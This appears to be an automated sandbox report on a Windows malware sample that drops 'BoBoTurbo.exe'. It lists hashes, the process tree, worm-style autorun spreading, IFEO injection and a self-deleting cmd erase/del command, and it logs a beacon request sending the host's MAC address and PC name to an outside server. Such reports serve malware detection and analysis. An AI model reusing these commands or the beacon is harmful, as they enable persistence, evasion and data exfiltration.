Analysis

  • max time kernel
    121s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    02/10/2024, 20:20 UTC

General

  • Target

    0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe

  • Size

    161KB

  • MD5

    0c53020e8fb7b089a7fcb9d1534e7d60

  • SHA1

    49304cb6355babbfd878ab5a0b01f34deb8030b1

  • SHA256

    c6f22aa00fa730828c90e7032889291c5b624facd56561e6684c855927ae4939

  • SHA512

    981978b569bb92540b6bfbe972b281b8c118612d4b1590763be5ca6eb19a8971fc4518d0c3cf0507986b595903c5791ca29bbfd3b562849a0379a1af7a5920eb

  • SSDEEP

    1536:dVyn1qvUo29OpBlXb94kWV7PYKmy8MMoWQdSCXa:2n1QTOkWZwy/7q

Malware Config

Signatures

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.

  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe _sys
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system\BoBoTurbo.exe
        C:\Windows\system\BoBoTurbo.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system\BoBoTurbo.exe
          C:\Windows\system\BoBoTurbo.exe _sys
          4⤵
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\system\BoBoTurbo.exe
            C:\Windows\system\BoBoTurbo.exe down
            5⤵
            • Executes dropped EXE
            PID:2116
          • C:\Windows\system\BoBoTurbo.exe
            C:\Windows\system\BoBoTurbo.exe worm
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Drops autorun.inf file
            • Drops file in Program Files directory
            PID:2688
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c erase /A:RHSA "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"&cmd /c del "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c del "C:\Users\Admin\AppData\Local\Temp\0c53020e8fb7b089a7fcb9d1534e7d60_JaffaCakes118.exe"
          4⤵
          • Deletes itself
          • System Location Discovery: System Language Discovery
          PID:2764

Network

  • flag-us
    DNS
    g.6u6.biz
    BoBoTurbo.exe
    Remote address:
    8.8.8.8:53
    Request
    g.6u6.biz
    IN A
    Response
  • flag-us
    DNS
    union.21575.com
    BoBoTurbo.exe
    Remote address:
    8.8.8.8:53
    Request
    union.21575.com
    IN A
    Response
    union.21575.com
    IN A
    107.167.27.81
  • flag-us
    GET
    http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0
    BoBoTurbo.exe
    Remote address:
    107.167.27.81:80
    Request
    GET /count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
    Host: union.21575.com
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Date: Wed, 02 Oct 2024 20:22:04 GMT
    Content-Length: 1502
  • 107.167.27.81:80
    http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0
    http
    BoBoTurbo.exe
    647 B
    2.0kB
    9
    9

    HTTP Request

    GET http://union.21575.com/count/count.asp?mac=EA-F9-33-E4-02-31&ver=14&user=14gx&pc=MXQFNXLT&md5=42475827c4e38bc805d2c418cd7a3df0

    HTTP Response

    200
  • 8.8.8.8:53
    g.6u6.biz
    dns
    BoBoTurbo.exe
    55 B
    117 B
    1
    1

    DNS Request

    g.6u6.biz

  • 8.8.8.8:53
    union.21575.com
    dns
    BoBoTurbo.exe
    61 B
    77 B
    1
    1

    DNS Request

    union.21575.com

    DNS Response

    107.167.27.81

MITRE ATT&CK Enterprise v15

Downloads

  • \Windows\system\BoBoTurbo.exe

    Filesize

    161KB

    MD5

    0c53020e8fb7b089a7fcb9d1534e7d60

    SHA1

    49304cb6355babbfd878ab5a0b01f34deb8030b1

    SHA256

    c6f22aa00fa730828c90e7032889291c5b624facd56561e6684c855927ae4939

    SHA512

    981978b569bb92540b6bfbe972b281b8c118612d4b1590763be5ca6eb19a8971fc4518d0c3cf0507986b595903c5791ca29bbfd3b562849a0379a1af7a5920eb

  • memory/1576-5-0x0000000000300000-0x0000000000326000-memory.dmp

    Filesize

    152KB

  • memory/1576-19-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/1760-39-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/1916-0-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/1916-1-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/2116-32-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/2628-14-0x0000000000220000-0x0000000000246000-memory.dmp

    Filesize

    152KB

  • memory/2628-28-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/2688-41-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB

  • memory/2688-77-0x0000000000800000-0x0000000000826000-memory.dmp

    Filesize

    152KB
